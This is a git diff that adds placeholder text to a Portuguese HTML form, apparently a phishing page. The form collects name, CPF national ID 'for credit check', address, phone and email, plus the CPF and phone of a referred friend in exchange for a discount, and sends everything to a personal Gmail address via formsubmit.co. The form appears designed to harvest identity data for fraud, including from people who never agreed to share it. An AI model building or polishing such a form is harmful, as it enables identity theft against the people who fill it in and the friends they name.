Atualiza formulário com placeholders e mensagem de obrigado personalizada

--- a/index.html
+++ b/index.html
@@ -16,7 +16,7 @@
 
   <form action="https://formsubmit.co/gilson.tavares1510@gmail.com" method="POST">
     <label>Nome completo:
-      <input type="text" name="nome" required />
+      <input type="text" name="nome" required placeholder="Digite seu nome completo" />
     </label>
 
     <label>CPF (para consulta de crédito):
@@ -24,11 +24,11 @@
     </label>
 
     <label>CEP:
-      <input type="text" name="cep" required />
+      <input type="text" name="cep" required placeholder="Ex: 59584-000" />
     </label>
 
     <label>Endereço completo:
-      <input type="text" name="endereco" required />
+      <input type="text" name="endereco" required placeholder="Rua, número, bairro e cidade" />
     </label>
 
     <label>Telefone com DDD:
@@ -36,25 +36,25 @@
     </label>
 
     <label>Email:
-      <input type="email" name="email" required />
+      <input type="email" name="email" required placeholder="seuemail@exemplo.com" />
     </label>
 
     <label>Ponto de referência:
-      <input type="text" name="referencia" />
+      <input type="text" name="referencia" placeholder="Próximo à escola, igreja, etc." />
     </label>
 
     <h3>Indique um amigo e ganhe 50% de desconto</h3>
 
     <label>Nome da pessoa indicada:
-      <input type="text" name="indicacao_nome" />
+      <input type="text" name="indicacao_nome" placeholder="Nome completo do amigo" />
     </label>
 
     <label>CPF da pessoa indicada:
-      <input type="text" name="indicacao_cpf" />
+      <input type="text" name="indicacao_cpf" placeholder="CPF do amigo indicado" />
     </label>
 
     <label>Telefone com DDD da pessoa indicada:
-      <input type="tel" name="indicacao_telefone" placeholder="Ex: (84) 91234-5678" />
+      <input type="tel" name="indicacao_telefone" placeholder="Ex: (84) 98765-4321" />
     </label>
 
     <input type="hidden" name="_next" value="https://formulario-proxxima.vercel.app/obrigado.html" />
@@ -64,6 +64,7 @@
   </form>
 </body>
 </html>
+
 
 
 
